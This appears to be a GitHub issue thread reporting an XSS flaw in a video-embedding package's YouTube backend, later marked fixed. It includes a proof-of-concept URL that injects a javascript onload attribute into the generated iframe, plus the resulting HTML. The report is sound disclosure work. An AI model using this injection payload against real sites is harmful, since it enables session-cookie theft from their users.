XSS possible in YoutubeBackend with user-provided URL

Question

XSS possible in YoutubeBackend with user-provided URL

Remiz opened this issue 2 years ago · comments

Hi,

I think I've noticed a possible XSS using this package when users are allowed to provide urls.
Here is the code I've used reproduce the issue:

import embed_video

url = 'https://www.youtube.com/watch?v=\asa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https%3A%2F%2Fwww.aa%22aaaa.com onload=%22javascript:alert(document.cookie)%22'
video = embed_video.backends.detect_backend(url)
video.is_secure = True
print(video.get_embed_code(800, 400))

And here is the result of the embedded code:

<iframe width="800" height="400" src="https://www.youtube.com/embed/sa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https://www.aa"aaaa.com onload="javascript:alert(document.cookie)"?wmode=opaque" loading="lazy" frameborder="0" allowfullscreen></iframe>

It looks like the url encoded double quotes are decoded by urlparse.parse_qs somehow.

Aleksi Häkli · Answer 1 · Wed Aug 17 2022 19:40:53 GMT+0800 (China Standard Time)

Hi and thanks for catching this.

The URL needs to be validated and sanitized. Would anyone happen to have ideas and time for improving the security?

Aleksi Häkli · Answer 2 · Wed Sep 28 2022 16:56:55 GMT+0800 (China Standard Time)

Fixed by #187